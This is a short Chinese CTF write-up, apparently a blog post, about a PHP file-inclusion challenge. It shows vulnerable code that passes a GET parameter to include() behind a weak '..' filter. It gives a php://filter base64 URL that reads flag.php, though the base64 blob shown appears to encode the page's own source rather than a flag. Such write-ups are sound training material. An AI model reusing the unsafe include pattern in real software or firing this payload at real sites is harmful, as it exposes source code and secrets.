【CTF WEB】文件包含

文件包含

题目要求:

请找到题目中FLAG

漏洞源码

<meta charset='utf-8'>
<center><h1>文件阅读器</h1></center>
<!-- 据说flag在flag.php里 -->
<?php
error_reporting(0);
$f=$_GET['file'];
if(stripos($f,"..")===false)
{
	//;
}
else
{
	exit('invalid');
}
if(!$f)
{
	header('Location: ?file=test.txt');
}
else
{
	include($f);
}
?>

测试方法

http://localhost/?file=php://filter/read=convert.base64-encode/resource=flag.php

解开base64就能拿到key了

PG1ldGEgY2hhcnNldD0ndXRmLTgnPg0KPGNlbnRlcj48aDE+5paH5Lu26ZiF6K+75ZmoPC9oMT48L2NlbnRlcj4NCjwhLS0g5o2u6K+0ZmxhZ+WcqGZsYWcucGhw6YeMIC0tPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCiRmPSRfR0VUWydmaWxlJ107DQppZihzdHJpcG9zKCRmLCIuLiIpPT09ZmFsc2UpDQp7DQoJLy87DQp9DQplbHNlDQp7DQoJZXhpdCgnaW52YWxpZCcpOw0KfQ0KaWYoISRmKQ0Kew0KCWhlYWRlcignTG9jYXRpb246ID9maWxlPXRlc3QudHh0Jyk7DQp9DQplbHNlDQp7DQoJaW5jbHVkZSgkZik7DQp9DQo/Pg==
posted @ 2018-09-29 14:00  17bdw  阅读(1364)  评论(0编辑  收藏  举报